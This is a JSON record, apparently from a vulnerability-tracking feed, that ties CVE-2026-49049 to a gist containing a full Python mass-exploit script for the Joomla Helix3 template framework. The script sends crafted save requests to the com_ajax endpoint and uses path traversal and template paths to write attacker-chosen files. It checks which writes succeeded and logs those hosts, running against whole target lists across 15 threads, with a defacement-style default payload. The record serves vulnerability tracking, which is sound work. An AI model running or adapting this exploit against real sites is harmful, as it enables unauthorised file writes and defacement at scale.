{"uuid": "c8f38285-15c9-4143-af6a-ca3aa386b3c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-49049", "type": "seen", "source": "https://gist.github.com/6ickzone/aabde4a1ad4f5b88cd0205d13ba4b609", "content": "#!/usr/bin/env python3\nimport requests\nimport sys\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\n\n# Colors\nCYAN = \"\\033[1;36m\"\nGREEN = \"\\033[1;32m\"\nYELLOW = \"\\033[1;33m\"\nRED = \"\\033[1;31m\"\nRESET = \"\\033[0m\"\n\ndef banner():\n    os.system('clear' if os.name == 'posix' else 'cls')\n    print(f\"\"\"{CYAN}\n   \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557  \u2588\u2588\u2557\n  \u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u255a\u2588\u2588\u2557\u2588\u2588\u2554\u255d\n  \u2588\u2588\u2551   \u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2554\u255d \n  \u2588\u2588\u2551   \u2588\u2588\u2551 \u2588\u2588\u2554\u2588\u2588\u2557 \n  \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2554\u255d \u2588\u2588\u2557\n   \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d  \u255a\u2550\u255d\n{RESET}\n[+] Helix3 Multi-Path Scanner\n[+] CVE-2026-49049 | By: 0x6ick\n\"\"\")\n\nHEADERS = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'\n}\n\ndef exploit_target(target, filename, payload):\n    target = target.strip()\n    if not target.startswith(('http://','https://')): target = \"http://\" + target\n    target = target.rstrip('/')\n    \n    session = requests.Session()\n    session.headers.update(HEADERS)\n    \n    paths_to_try = [\n        '../../../' + filename, \n        'templates/shaper_helix3/layouts/' + filename, \n        'tmp/' + filename\n    ]\n    \n    try:\n        probe_url = f\"{target}/index.php?option=com_ajax&amp;plugin=helix3&amp;format=json\"\n        \n        # Probe\n        r = session.post(probe_url, data={'data[action]': 'save', 'data[layoutName]': 'probe', 'data[content]': '{\"t\":\"1\"}'}, timeout=8)\n        \n        if r.status_code == 200 and 'success' in r.text.lower():\n            for path in paths_to_try:\n                data_exploit = {\n                    'data[action]': 'save',\n                    'data[layoutName]': path,\n                    'data[content]': payload\n                }\n                session.post(probe_url, data=data_exploit, timeout=8)\n                \n                check = session.get(f\"{target}/{filename}.json\", timeout=5)\n                \n                if check.status_code == 200:\n                    print(f\"{GREEN}[+] SUCCESS: {target} (Path: {path}){RESET}\")\n                    with open(\"result.txt\", \"a\") as f: f.write(f\"{target}/{filename}.json\\n\")\n                    return True\n            \n            print(f\"{YELLOW}[!] VULN but Write failed on all paths: {target}{RESET}\")\n        else:\n            print(f\"{RED}[-] NOT VULN: {target}{RESET}\")\n            \n    except Exception:\n        print(f\"{RED}[-] ERROR: {target}{RESET}\")\n    return False\n\ndef main():\n    banner()\n    list_file = input(f\"{CYAN}[?] Target list file: {RESET}\")\n    \n    custom_name = input(f\"{CYAN}[?] Filename (default: 0x6ick): {RESET}\") or \"0x6ick\"\n    custom_payload = input(f\"{CYAN}[?] JSON content (default: stamped by 0x6ick): {RESET}\") or \"stamped by 0x6ick\"\n    \n    try:\n        with open(list_file, \"r\") as f:\n            targets = list(set([line.strip() for line in f if line.strip()]))\n        \n        print(f\"\\n{CYAN}[*] Starting mass exploit on {len(targets)} targets...{RESET}\\n\")\n        \n        with ThreadPoolExecutor(max_workers=15) as executor:\n            for t in targets:\n                executor.submit(exploit_target, t, custom_name, custom_payload)\n            \n        print(f\"\\n{GREEN}[+] DONE! Results saved in result.txt{RESET}\")\n        \n    except FileNotFoundError:\n        print(f\"{RED}[!] File not found!{RESET}\")\n\nif __name__ == \"__main__\":\n    main()\n", "creation_timestamp": "2026-07-13T06:01:19.425242Z"}